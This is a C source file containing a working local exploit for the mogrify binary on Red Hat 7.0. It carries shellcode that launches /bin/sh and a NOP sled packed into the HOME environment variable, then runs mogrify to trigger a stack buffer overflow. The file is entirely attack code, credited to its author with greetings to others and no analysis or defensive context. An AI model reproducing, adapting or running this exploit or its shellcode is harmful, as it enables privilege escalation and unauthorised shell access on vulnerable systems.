/*
 /usr/X11R6/bin/mogrify (rh 7.0) exploit by Zucco (zucco@netposta.net)
 Thx to: lez, [Cr0W], akos, slash, scrippie, sirc/#coders, EFnet/#hwa-security 
*/
#include <stdlib.h>

#define OFFSET                  0
#define LEN                     1696
#define NOP                     0x90

char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {
    __asm__("movl %esp,%eax");
}

main(int argc, char **argv) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=OFFSET, bsize=LEN;
  int i;

  if (argc > 1) offset = atoi(argv[1]);

  if (!(buff = malloc(bsize))) {
      printf("Memory suxx..\n");
      exit(0);
  }

  addr = get_sp() - offset;

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
        *(addr_ptr++) = addr;

  for (i = 0; i < bsize/2; i++)
        buff[i] = NOP;

  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
      *(ptr++) = shellcode[i];

  setenv("HOME",buff,1);
  execlp("/usr/X11R6/bin/mogrify", "zzzzz",0);
}